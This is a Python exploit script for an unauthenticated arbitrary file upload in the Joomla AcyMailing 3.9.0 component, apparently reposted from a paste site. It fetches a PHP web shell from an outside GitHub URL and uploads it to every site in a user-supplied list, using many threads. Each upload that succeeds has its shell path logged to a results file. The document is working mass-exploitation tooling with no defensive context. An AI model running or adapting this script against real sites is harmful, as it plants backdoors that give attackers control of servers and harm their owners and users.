Joomla! ACYMAILING 3.9.0 component - Unauthenticated Arbitrary File Upload

1. ## Source : https://pastebin.com/raw/2MwLpvyK
2. import requests as req
3. import os
4. import sys
5. import json
6. import urllib3
7. from multiprocessing import Pool
8. from multiprocessing.dummy import Pool as ThreadPool
9. from urllib.parse import urlparse
10. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
11. proxies = {}
12. #proxies = {
13. #  'http': 'http://127.0.0.1:8080',
14. #  'https': 'http://127.0.0.1:8080',
15. #}
16. user_agent = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"}
17. shell_content = req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", headers=user_agent).text
18. def clear():
19.     linux   = 'clear'
20.     windows = 'cls'
21.     os.system([linux, windows][os.name == 'nt'])
22. def fail(msg):
23.     error_back = lambda x: "\033[41m\033[97m{}\033[0m\033[0m".format(x)
24.     print("{} {}".format(error_back("[FAIL]"), msg))
25. def ok(msg):
26.     success_back = lambda x: "\033[42m\033[97m{}\033[0m\033[0m".format(x)
27.     print("{} {}".format(success_back("[OK]"), msg))
28. def is_json(data):
29.     try:
30.       json_object = json.loads(data)
31.     except ValueError as e:
32.       return False
33.     return True
34. def url_validator(url):
35.     try:
36.         result = urlparse(url)
37.         return all([result.scheme, result.netloc, result.path])
38.     except:
39.         return False
40. def exploit(url):
41.     url = url.decode()
42.     data = {}
43.     data["option"] = "com_acym"
44.     data["ctrl"] = "frontmails"
45.     data["task"] = "setNewIconShare"
46.     data["social"] = "xxxdddshell"
47.     try:
48.         r = req.post(url, data=data, files={"file":("lalala.php", shell_content, "text/php")}, proxies=proxies, verify=False, headers=user_agent)
49.     except KeyboardInterrupt:
50.         print("EXITING!!!!!!!!!!")
51.         sys.exit()
52.     except Exception as e:
53.         print("[{}] {}".format(url, e))
54.         return
55.     if r.status_code == 200:
56.         response = r.text
57.         if "xxxdddshell" in response:
58.             shell_path = False
59.             if is_json(response):
60.                 json_url = json.loads(response)
61.                 if json_url.get("url"):
62.                     shell_path = "{}.php".format(json_url["url"])
63.             else:
64.                 if url_validator(shell_path):
65.                     shell_path = response
66.             if shell_path:
67.                 ok("{} GOTCHAAAAAAA!".format(shell_path))
68.                 with open("result.txt", "a") as newline:
69.                     newline.write("{}\n".format(shell_path))
70.                     newline.close()
71.             else:
72.                 fail("{} not uploaded".format(url))
73.         else:
74.             fail("{} not uploaded".format(url))
75.     else:
76.         fail("{} not uploaded".format(url))
77.     return
78. def main():
79.     clear()
80.     banner = """
81.          __n__n__
82.   .------`-\\00/-'
83.  /  ##  ## (oo)
84. / \## __   ./
85.    |//YY \|/
86.    |||   |||          ^^^ ^
87. +---------------------------------------------------------------------------------------------+
88. | Title          : Joomla! ACYMAILING 3.9.0 component - Unauthenticated Arbitrary File Upload |
89. | Coder          : s4ndal.py                                                                  |
90. +---------------------------------------------------------------------------------------------+
91.    """
92.     print(banner)
93.     threads = input("[?] Threads > ")
94.     list_file = input("[?] List websites file > ")
95.     print("[!] all result saved in result.txt")
96.     with open(list_file, "rb") as file:
97.         lines = [line.rstrip() for line in file]
98.         th = ThreadPool(int(threads))
99.         th.map(exploit, lines)
100. main()
101.